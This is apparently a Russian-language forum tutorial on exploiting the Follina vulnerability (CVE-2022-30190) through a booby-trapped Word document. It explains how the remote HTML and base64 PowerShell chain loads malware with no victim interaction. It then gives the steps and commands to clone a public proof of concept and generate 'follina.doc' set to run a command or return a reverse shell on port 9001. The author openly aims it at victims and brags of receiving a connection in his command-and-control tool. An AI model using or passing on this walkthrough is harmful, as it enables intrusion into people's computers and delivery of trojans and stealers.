CVE-2022-30190 или взлом с помощью doc документа

​

qq,сегодня поговорим об уязвимости msdt-follina
CVE-2022-30190

Подробнее об самой уязвимости

Короче коротко-и понятно, мистер робот создает вордовский док .doc, содержащий
ссылку на вредоносный OLE-объект типо document.xml.rels который располгается на хостинге
Html файл который внутри содержит код с помощью специальной URI-схемы.
Уже подготовленный троян,rat,stiller,clipper, и т/д малварь при открытии запускает msdt-инструмент для устранения неполадок
в винде.После этого мистер робот может через параметры передать этому инструменту любую команду для выполнения
к пример powershell-команду для выполнения определенного дейсвтия, к примеру подгрузка малваря.
Работает даже в том случаи если ДАЖЕ включен в защищенном режиме(подробнее будет внизу)
Ну или кратко внутри document.xml.rels содержится вредоносный код который обращается к html расположенному на целевом хосте.Потом этот html файл внутри имеет себе закодированную в base64 команду powershell которая подгружает и запуксает малварь,жертва даже не должна будет нажимать на какие либо кнопки все произойдет на автомате при запуске документа.

Фаза 1
Первое что мы делаем это загружаем уже готовый проект образца нашей фоллины
Код:

git clone https://github.com/JohnHammond/msdt-follina

Код

git clone https://github.com/JohnHammond/msdt-follina

После установки переходим в директорию с самим данным образцом
Фаза 2
Второе что мы делаем это запускам python скрипт с определнным параметром
для того чтобы запустить прослушку порта или же я представлю вам несколько образцов для запуска
Код:

python3 follina.py -c "notepad" #запустить notepad при открытии документа[/B]
python3 follina.py -r 9001 #запустить прослушку порта-при открытии будете получать реверс коннект

Код

python3 follina.py -c "notepad" #запустить notepad при открытии документа[/B]

python3 follina.py -r 9001  #запустить прослушку порта-при открытии будете получать реверс коннект

Фаза 3
Третье завершающее это ваш готовый малварь, открываете 2-ой терминал и переходите по тому же пути
где вы скачали образцы фоллины.Там и будет ваш doc файл под именем "follina.doc"

Потом можете чекнуть doc файл на virtual box.
И при открытии на windows с wordом вы будете получать спойкойный реверс-коннект в cmd
но я вам показал лишь основу этой уязвимости можно придумать еще кое что, сейчас я представлю обзор
где я изменил фоллину на автоматический подгрузку файл, и последующий запуск что даст мне контроль над этим таргетом.


Как видите в мою кобу пришел коннект через эту cve.

• • Спасибо за чтение(видео с обзором уязвимости здесь )